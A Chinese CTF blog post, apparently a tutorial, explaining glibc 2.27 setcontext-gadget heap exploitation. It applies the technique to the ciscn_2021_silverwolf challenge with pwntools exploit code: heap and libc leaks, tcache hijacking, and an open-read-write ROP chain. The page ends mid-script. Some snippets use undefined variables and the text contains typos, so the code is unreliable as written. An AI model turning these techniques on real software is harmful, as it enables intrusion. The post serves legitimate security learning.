<!doctype html>
<head>
  <meta charset="utf-8">
  <meta name="description" content="&lt;h3 id=&#34;前言&#34;&gt;&lt;a href=&#34;#前言&#34; class=&#34;headerlink&#34; title=&#34;前言&#34;&gt;&lt;/a&gt;前言&lt;/h3&gt;&lt;p&gt;越来越卷，只能这么说了，现在高版本下的利用方式越来越难，甚至有的比赛直接算是全部上kernel。然后新手小白感到这个年代的pwn手并不适合生存。算了，比赛是比赛，总之还是需要生活的。于是浏览了许多大佬的博客发现讲的并不是很详细于是想自己动手，在大佬给出利用调用">
  <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, user-scalable=yes">
  <title>libc_heap(1) | powercat</title>

  <link rel="stylesheet" id="chosen-theme" href="https://rawgit.com/fiatjaf/classless/master/themes/plain/theme.css">
  <script>
let link = document.getElementById('chosen-theme')
let widget = document.createElement('div')
widget.style.position = 'absolute'
widget.style.right = '5px'
widget.style.top = '2px'
widget.style.background = 'beige'
widget.style.color = '#444'
widget.style.zIndex = 99
widget.style.padding = '4px 8px'
widget.innerHTML = `
<label>
  <p>No theme was set on <code>theme_config</code>.<br>
     Choose a theme from the list to experiment with it:</p>
  <select></select>
</label>
`
fetch('https://api.github.com/repos/fiatjaf/classless/contents/themes')
  .then(r => r.json())
  .then(files => {
    document.body.appendChild(widget)
    let select = document.querySelector('select')
    files
      .filter(f => f.type === 'dir')
      .forEach(f => {
        let option = document.createElement('option')
        option.value = f.name
        option.innerHTML = f.name
        select.appendChild(option)
      })
    let options = Array.from(select.querySelectorAll('option'))
    let chosen = options[parseInt(Math.random() * options.length)]
    chosen.selected = true
    link.href = link.href.replace(/themes\/[^\/]+/, `themes/${chosen.value}`)
    select.addEventListener('change', e => {
      let chosen = e.target.value
      link.href = link.href.replace(/themes\/[^\/]+/, `themes/${chosen}`)
    })
  })
  .catch(console.log)
  </script>

<meta name="generator" content="Hexo 6.2.0"></head>

<body>
  <header role="banner">
      <a href="/">
        
          <img src="https://picsum.photos/640/480">
        
      </a>  
    <h1>
      <a href="/">powercat</a>
    </h1>
    <aside>
      <p></p>
    </aside>
  </header>
  
  <main>
    <article>
  <header>
  
  <h1><a href="http://example.com/2022/03/20/heap1/">libc_heap(1)</a></h1>
  <aside>
    
    <time datetime="222022-03-20">
      March 20th 2022
    </time>
    
    <ul>
    
      <li><a href="/tags/study/">study</a></li>
    
    </ul>
  </aside>
</header>

  <div><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>越来越卷，只能这么说了，现在高版本下的利用方式越来越难，甚至有的比赛直接算是全部上kernel。然后新手小白感到这个年代的pwn手并不适合生存。算了，比赛是比赛，总之还是需要生活的。于是浏览了许多大佬的博客发现讲的并不是很详细于是想自己动手，在大佬给出利用调用链的基础下进行一个利用的详细讲解。大部分高版本的House系列现在都配上了现在比较主流的Largebin Attack以及Tcache Stashing Unlink Attack，还有setcontext的一些gadget的利用、由于很卷所以就有了一些沙箱的然后进行orw出flag。这样的话初步想法是本文先进行讲解setcontext的利用。在网上的资料讲解的不是很详细，起码对于我如此小白的人来说是非常难理解的，所以我想写下一篇比较详细的文章来讲解并且可以造福更多的人。</p>
<h3 id="故事的开始"><a href="#故事的开始" class="headerlink" title="故事的开始"></a>故事的开始</h3><p>故事的开始是我在复现21年的国赛的时候，复现的时候发现这道题说了一句setcontex+58，我也不知是什么然后复现的时候只是跟着走。在之后的比赛里面也是找到了类似的东西似乎还是去学习一下比较好。</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>首先讲解libc2.27下的setcontext吧</p>
<p>用ida打开libc-2.27.so找到setcontext函数，发现setcontext里面都是以rdi寄存器为索引向各种寄存器里面进行传输数值，如果我们能控制rdi的内容的话就会很轻松的控制其他寄存器。</p>
<p><img src="https://assets.b3logfile.com/siyuan/1637149294294/assets/image-20220330225350-w4yq3u4.png" alt="image.png"></p>
<p>至于我们前面提到的setcontext+53就是从rdi索引向各寄存器传输数值的那一行这样的话一直到结束我们就可以根基偏移布置好相应的数值控制各寄存器。我们在上面看到了rsp，这是非常关键的，如果控制了rsp也就是控制了栈。</p>
<p>还有我之前没有注意到的一个地方，是在__lifanxin大佬的博客中发现的：</p>
<p>修改rcx的值后接着有个push操作将rcx压栈，然后汇编指令按照顺序会执行截图中最后的retn操作，而retn的地址就是压入栈的rcx值，因此修改rcx就获得了控制程序流程的能力。</p>
<h3 id="利用方法"><a href="#利用方法" class="headerlink" title="利用方法"></a>利用方法</h3><p>利用方法的话就是利用我们熟悉的__free_hook还有__malloc_hook，就像我们平时利用这两个hook写og getshell的时候。我们一般来利用setcontext都是利用__free_hook进行调用因为free的参数是堆块，而malloc的参数是数字，这样的话使用free来的更快。</p>
<h4 id="劫持栈地址"><a href="#劫持栈地址" class="headerlink" title="劫持栈地址"></a>劫持栈地址</h4><p>我们看到gadget中的rsp，是我们劫持栈的关键：</p>
<p><img src="https://assets.b3logfile.com/siyuan/1637149294294/assets/image-20220330233635-cuwyx1w.png" alt="image.png"></p>
<p>可见是将rdi+0xa0处的内容放入rsp寄存器，也可以这么理解。在可以执行setcontext的条件下，假如能够控制rdi+0xa地方的内容也就是有了控制rsp的能力，即控制栈的能力。</p>
<h4 id="劫持返回地址"><a href="#劫持返回地址" class="headerlink" title="劫持返回地址"></a>劫持返回地址</h4><p>我们再看：</p>
<p>先是一段将rdi+0xe0的数据传递给rcx，下面又有一个将rcx压入栈的操作，再最后是有retn的，那么就相当于只要是控制rdi+0xe0就相当于控制了程序的执行流</p>
<p><img src="https://assets.b3logfile.com/siyuan/1637149294294/assets/image-20220330234556-uzv6ql0.png" alt="image.png"></p>
<h3 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h3><p>setcontext一般利用于需要绕过沙箱机制进行orw的时候，将程序流劫持到构造的orw链中去 ,构造的时候也比较方便只需要在rdi堆块下面固定偏移的范围内进行布置数据。（要找好偏移。</p>
<h3 id="题目练习"><a href="#题目练习" class="headerlink" title="题目练习"></a>题目练习</h3><p>题目：ciscn_2021_silverwolf</p>
<p>环境：ubuntu18.04</p>
<p>glibc版本：Ubuntu GLIBC 2.27-3ubuntu1.3</p>
<h4 id="例行检查"><a href="#例行检查" class="headerlink" title="例行检查"></a>例行检查</h4><p>64位全绿</p>
<p><img src="https://assets.b3logfile.com/siyuan/1637149294294/assets/image-20220331001759-4muqebh.png" alt="image.png"></p>
<p>这个版本没有doublefree的检测，增查删改，有uaf</p>
<h4 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h4><p>利用df泄露heap地址，再利用df将堆块申请到控制head，将其分配至unsortedbin中，然后show泄露libc地址。之后修改tcache的堆指针劫持freehook，还有其他大小堆块布置好相应堆块，利用setcontext进行调用执行orw</p>
<h4 id="leak-heap-libc"><a href="#leak-heap-libc" class="headerlink" title="leak_heap_libc"></a>leak_heap_libc</h4><p>这两个都是源自于lonlywolf的利用方式，这里放出过程</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">###############leak_heap</span></span><br><span class="line">add(<span class="number">0x30</span>)</span><br><span class="line">delete()</span><br><span class="line">edit(<span class="string">&quot;a&quot;</span>*<span class="number">0x10</span>)</span><br><span class="line">delete()</span><br><span class="line">show()</span><br><span class="line">heap = u64(ru(<span class="string">&quot;\n&quot;</span>).ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">heap_base = heap-<span class="number">0x1920</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;heap base: &quot;</span>, <span class="built_in">hex</span>(heap_base))</span><br><span class="line"><span class="comment">#########hijack_tcache_head</span></span><br><span class="line">head = heap_base+<span class="number">0x10</span></span><br><span class="line">add(<span class="number">0x30</span>)</span><br><span class="line">edit(p64(head))</span><br><span class="line">add(<span class="number">0x30</span>)</span><br><span class="line">add(<span class="number">0x30</span>)</span><br><span class="line"><span class="comment">#############leak_libc</span></span><br><span class="line"><span class="built_in">str</span> = p64(<span class="number">0</span>)*<span class="number">4</span>+p64(<span class="number">0x00000000ff000000</span>)</span><br><span class="line">edit(<span class="built_in">str</span>)</span><br><span class="line">delete()</span><br><span class="line">show()</span><br><span class="line">libc = u64(ru(<span class="string">&quot;\n&quot;</span>).ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">libc_base = libc-<span class="number">0x70</span>-libc.sym[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line">setcontext = libc_base+libc.sym[<span class="string">&quot;setcontext&quot;</span>]+<span class="number">53</span></span><br><span class="line">free_hook = libc_base+libc.sym[<span class="string">&quot;__free_hook&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc base: &quot;</span>, <span class="built_in">hex</span>(libc_base))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;setcontext_53: &quot;</span>, <span class="built_in">hex</span>(setcontext))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;free_hook: &quot;</span>, <span class="built_in">hex</span>(free_hook))</span><br></pre></td></tr></table></figure>

<h4 id="构造orw"><a href="#构造orw" class="headerlink" title="构造orw"></a>构造orw</h4><p>没啥说的，就是构造。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">flag_addr = heap_base+<span class="number">0x2000</span></span><br><span class="line"></span><br><span class="line">pop_rax_ret = base+<span class="number">0x000000000001ced0</span></span><br><span class="line">pop_rdi_ret = base+<span class="number">0x000000000002144f</span></span><br><span class="line">pop_rsi_ret = base+<span class="number">0x0000000000021e22</span></span><br><span class="line">pop_rdx_ret = base+<span class="number">0x0000000000001b96</span></span><br><span class="line">read = base+libc.sym[<span class="string">&quot;read&quot;</span>]</span><br><span class="line">write = base+libc.sym[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">syscall = read_f+<span class="number">0xf</span><span class="comment">#程序中找不到open，就利用系统调用</span></span><br><span class="line"></span><br><span class="line">orw = p64(pop_rdi_ret)+p64(flag_addr)</span><br><span class="line">orw += p64(pop_rsi_ret)+p64(<span class="number">0</span>)</span><br><span class="line">orw += p64(pop_rax_ret)+p64(<span class="number">2</span>)</span><br><span class="line">orw += p64(syscall)</span><br><span class="line">orw += p64(pop_rdi_ret)+p64(<span class="number">3</span>)</span><br><span class="line">orw += p64(pop_rsi_ret)+p64(flag_addr)</span><br><span class="line">orw += p64(pop_rdx_ret)+p64(<span class="number">0x30</span>)</span><br><span class="line">orw += p64(read_f)</span><br><span class="line">orw += p64(pop_rdi_ret)+p64(<span class="number">1</span>)</span><br><span class="line">orw += p64(pop_rsi_ret)+p64(flag_addr)</span><br><span class="line">orw += p64(pop_rdx_ret)+p64(<span class="number">0x30</span>)</span><br><span class="line">orw += p64(write_f)</span><br></pre></td></tr></table></figure>


<h4 id="根据setcontext进行构造"><a href="#根据setcontext进行构造" class="headerlink" title="根据setcontext进行构造"></a>根据setcontext进行构造</h4><h5 id="tcache-head"><a href="#tcache-head" class="headerlink" title="tcache_head"></a>tcache_head</h5><p>在进行布置的时候为了更好的去利用，官方的wp中hijack了tcache_perthread_struct，那么我们就看一下tcache_perthread_struct的结构：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">tcache_perthread_struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="type">char</span> counts[TCACHE_MAX_BINS];<span class="comment">//数组长度64，每个元素最大为0x7，仅占用一个字节（对应64个tcache链表）</span></span><br><span class="line">  tcache_entry *entries[TCACHE_MAX_BINS];<span class="comment">//entries指针数组（对应64个tcache链表，cache bin中最大为0x400字节</span></span><br><span class="line">  <span class="comment">//每一个指针指向的是对应tcache_entry结构体的地址。</span></span><br><span class="line">&#125; tcache_perthread_struct;</span><br></pre></td></tr></table></figure>

<p>我们看到上面的结构体里面，在counts之后存在tcache链的指针，指向每一个大小的tcache链的下一个堆块的fd。也就是意味着我们只要劫持了这里的指针我们就能实现任意地址分配堆块。这里的布置利用的就是这个结构体中的指针。</p>
<h5 id="布置"><a href="#布置" class="headerlink" title="布置"></a>布置</h5><p>在布置的时候我们可以选择一个堆块为参数，就是以这个堆块的地址作为rdi，布置数据要根据此参数作为索引。</p>
<p>首先我们要先把堆块分配到tcache_entry的位置</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x48</span>)</span><br><span class="line">edit(p64(<span class="number">0</span>)*<span class="number">9</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">add(<span class="number">0x18</span>)</span><br><span class="line">edit(p64(heap_base+<span class="number">0x50</span>))<span class="comment">#修改tcache的fd指针到tcache_entry</span></span><br><span class="line">add(<span class="number">0x38</span>)<span class="comment">#申请到tcache_entry</span></span><br></pre></td></tr></table></figure>

<p>剩下的就是对tcache_entry中的指针进行布置了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">orw_addr = heap_base+<span class="number">0x1000</span><span class="comment">#挑个纯净的环境放置orw链</span></span><br><span class="line"></span><br><span class="line">payload = p64(free_hook)<span class="comment">#这里是0x20大小堆块的下一个堆块的指针，意味着我们再申请一个0x20大小的堆块就分配到了free_hook</span></span><br><span class="line">payload += p64(heap_base+<span class="number">0x2000</span>)<span class="comment">#这里是0x30大小堆块的下一个堆块的指针,这是作为rdi的堆块</span></span><br><span class="line">payload += p64(heap_base+<span class="number">0x20A0</span>)<span class="comment">#rdi+0xa0这里布置的应该是需要劫持的栈地址</span></span><br><span class="line">payload += p64(heap_base+<span class="number">0x2000</span>)<span class="comment">#0x50</span></span><br><span class="line">payload += p64(orw_addr+<span class="number">0x60</span>) + p64(orw_addr)<span class="comment">#0x60和0x70放我们的prw链，因为比较长所以需要放两个堆块</span></span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">edit(payload)<span class="comment">#写入</span></span><br></pre></td></tr></table></figure>

<p>下面就是着手要实施了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x10</span>)</span><br><span class="line">edit(p64(setcontext))<span class="comment">#劫持free_hook修改为free_hook</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x20</span>)</span><br><span class="line">edit(<span class="string">&quot;./flag\x00&quot;</span>)<span class="comment">#作为filename</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x30</span>)</span><br><span class="line">pl = p64(orw_addr) + p64(pop_rdi_ret+<span class="number">1</span>)<span class="comment">#用来控制rsp</span></span><br><span class="line">edit(pl)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x60</span>)</span><br><span class="line">edit(orw[:<span class="number">0x60</span>])</span><br><span class="line">add(<span class="number">0x50</span>)</span><br><span class="line">edit(orw[<span class="number">0x60</span>:])<span class="comment">#布置上orw链</span></span><br><span class="line"></span><br><span class="line">delete()<span class="comment">#触发</span></span><br></pre></td></tr></table></figure>

<h4 id="完整EXP"><a href="#完整EXP" class="headerlink" title="完整EXP"></a>完整EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding = utf-8</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> * </span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line">binary = <span class="string">&quot;silverwolf&quot;</span></span><br><span class="line">libcelf = <span class="string">&quot;libc-2.27.so&quot;</span></span><br><span class="line">ip = <span class="string">&quot;&quot;</span></span><br><span class="line">port = <span class="string">&quot;&quot;</span></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line">arm = <span class="number">0</span></span><br><span class="line">core = <span class="number">64</span></span><br><span class="line"></span><br><span class="line">og = [<span class="number">0x4342</span>,<span class="number">0x3342</span>]</span><br><span class="line"></span><br><span class="line">s       = <span class="keyword">lambda</span> data               :p.send(<span class="built_in">str</span>(data))</span><br><span class="line">sa      = <span class="keyword">lambda</span> delim,data         :p.sendafter(<span class="built_in">str</span>(delim), <span class="built_in">str</span>(data))</span><br><span class="line">sl      = <span class="keyword">lambda</span> data               :p.sendline(<span class="built_in">str</span>(data))</span><br><span class="line">sla     = <span class="keyword">lambda</span> delim,data         :p.sendlineafter(<span class="built_in">str</span>(delim), <span class="built_in">str</span>(data))</span><br><span class="line">r       = <span class="keyword">lambda</span> num=<span class="number">4096</span>           :p.recv(num)</span><br><span class="line">ru      = <span class="keyword">lambda</span> delims, drop=<span class="literal">True</span>  :p.recvuntil(delims, drop)</span><br><span class="line">itr     = <span class="keyword">lambda</span>                    :p.interactive()</span><br><span class="line">uu32    = <span class="keyword">lambda</span> data               :u32(data.ljust(<span class="number">4</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64    = <span class="keyword">lambda</span> data               :u64(data.ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">leak    = <span class="keyword">lambda</span> name,addr          :log.success(<span class="string">&#x27;&#123;&#125; = &#123;:#x&#125;&#x27;</span>.<span class="built_in">format</span>(name, addr))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(local==<span class="number">1</span>):</span><br><span class="line">	<span class="keyword">if</span>(arm==<span class="number">1</span>):</span><br><span class="line">		<span class="keyword">if</span>(core==<span class="number">64</span>):</span><br><span class="line">			p = process([<span class="string">&quot;qemu-arm&quot;</span>, <span class="string">&quot;-g&quot;</span>, <span class="string">&quot;1212&quot;</span>, <span class="string">&quot;-L&quot;</span>, <span class="string">&quot;/usr/arm-linux-gnueabi&quot;</span>,binary])</span><br><span class="line">		<span class="keyword">if</span>(core==<span class="number">32</span>):</span><br><span class="line">			p = process([<span class="string">&quot;qemu-aarch64&quot;</span>, <span class="string">&quot;-g&quot;</span>, <span class="string">&quot;1212&quot;</span>, <span class="string">&quot;-L&quot;</span>, <span class="string">&quot;/usr/aarch64-linux-gnu/&quot;</span>, binary])</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		p = process(binary)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">	p = remote(ip,port)</span><br><span class="line"></span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = ELF(libcelf)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">choice</span>(<span class="params">cho</span>):</span><br><span class="line">	sla(<span class="string">&#x27;Your choice: &#x27;</span>,cho)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size</span>):</span><br><span class="line">	choice(<span class="number">1</span>)</span><br><span class="line">	sla(<span class="string">&#x27;Index: &#x27;</span>,<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">	sla(<span class="string">&#x27;Size: &#x27;</span>,size)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>():</span><br><span class="line">	choice(<span class="number">4</span>)</span><br><span class="line">	sla(<span class="string">&#x27;Index: &#x27;</span>,<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>():</span><br><span class="line">	choice(<span class="number">3</span>)</span><br><span class="line">	sla(<span class="string">&#x27;Index: &#x27;</span>,<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">content</span>):</span><br><span class="line">	choice(<span class="number">2</span>)</span><br><span class="line">	sla(<span class="string">&#x27;Index: &#x27;</span>,<span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">	sla(<span class="string">&#x27;Content: &#x27;</span>,content) </span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pwn</span>():</span><br><span class="line">	add(<span class="number">0x30</span>)</span><br><span class="line">	delete()</span><br><span class="line">	edit(<span class="string">&quot;a&quot;</span>*<span class="number">0x10</span>)</span><br><span class="line">	delete()</span><br><span class="line">	show()</span><br><span class="line">	heap = u64(ru(<span class="string">&quot;\n&quot;</span>).ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">	heap_base = heap-<span class="number">0x1920</span></span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot;heap base: &quot;</span>, <span class="built_in">hex</span>(heap_base))</span><br><span class="line"></span><br><span class="line">	head = heap_base+<span class="number">0x10</span></span><br><span class="line">	add(<span class="number">0x30</span>)</span><br><span class="line">	edit(p64(head))</span><br><span class="line">	add(<span class="number">0x30</span>)</span><br><span class="line">	add(<span class="number">0x30</span>)</span><br><span class="line"></span><br><span class="line">	<span class="built_in">str</span> = p64(<span class="number">0</span>)*<span class="number">4</span>+p64(<span class="number">0x00000000ff000000</span>)</span><br><span class="line">	edit(<span class="built_in">str</span>)</span><br><span class="line">	delete()</span><br><span class="line">	show()</span><br><span class="line">	libc = u64(ru(<span class="string">&quot;\n&quot;</span>).ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">	libc_base = libc-<span class="number">0x70</span>-libc.sym[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line">	setcontext = libc_base+libc.sym[<span class="string">&quot;setcontext&quot;</span>]+<span class="number">53</span></span><br><span class="line">	free_hook = libc_base+libc.sym[<span class="string">&quot;__free_hook&quot;</span>]</span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot;libc base: &quot;</span>, <span class="built_in">hex</span>(libc_base))</span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot;setcontext_53: &quot;</span>, <span class="built_in">hex</span>(setcontext))</span><br><span class="line">	<span class="built_in">print</span>(<span class="string">&quot;free_hook: &quot;</span>, <span class="built_in">hex</span>(free_hook))</span><br><span class="line"></span><br><span class="line">	flag_addr = heap_base+<span class="number">0x2000</span></span><br><span class="line"></span><br><span class="line">	pop_rax_ret = base+<span class="number">0x000000000001ced0</span></span><br><span class="line">	pop_rdi_ret = base+<span class="number">0x000000000002144f</span></span><br><span class="line">	pop_rsi_ret = base+<span class="number">0x0000000000021e22</span></span><br><span class="line">	pop_rdx_ret = base+<span class="number">0x0000000000001b96</span></span><br><span class="line">	read = base+libc.sym[<span class="string">&quot;read&quot;</span>]</span><br><span class="line">	write = base+libc.sym[<span class="string">&quot;write&quot;</span>]</span><br><span class="line">	syscall = read_f+<span class="number">0xf</span></span><br><span class="line"></span><br><span class="line">	orw = p64(pop_rdi_ret)+p64(flag_addr)</span><br><span class="line">	orw += p64(pop_rsi_ret)+p64(<span class="number">0</span>)</span><br><span class="line">	orw += p64(pop_rax_ret)+p64(<span class="number">2</span>)</span><br><span class="line">	orw += p64(syscall)</span><br><span class="line">	orw += p64(pop_rdi_ret)+p64(<span class="number">3</span>)</span><br><span class="line">	orw += p64(pop_rsi_ret)+p64(flag_addr)</span><br><span class="line">	orw += p64(pop_rdx_ret)+p64(<span class="number">0x30</span>)</span><br><span class="line">	orw += p64(read_f)</span><br><span class="line">	orw += p64(pop_rdi_ret)+p64(<span class="number">1</span>)</span><br><span class="line">	orw += p64(pop_rsi_ret)+p64(flag_addr)</span><br><span class="line">	orw += p64(pop_rdx_ret)+p64(<span class="number">0x30</span>)</span><br><span class="line">	orw += p64(write_f)</span><br><span class="line"></span><br><span class="line">	add(<span class="number">0x48</span>)</span><br><span class="line">	edit(p64(<span 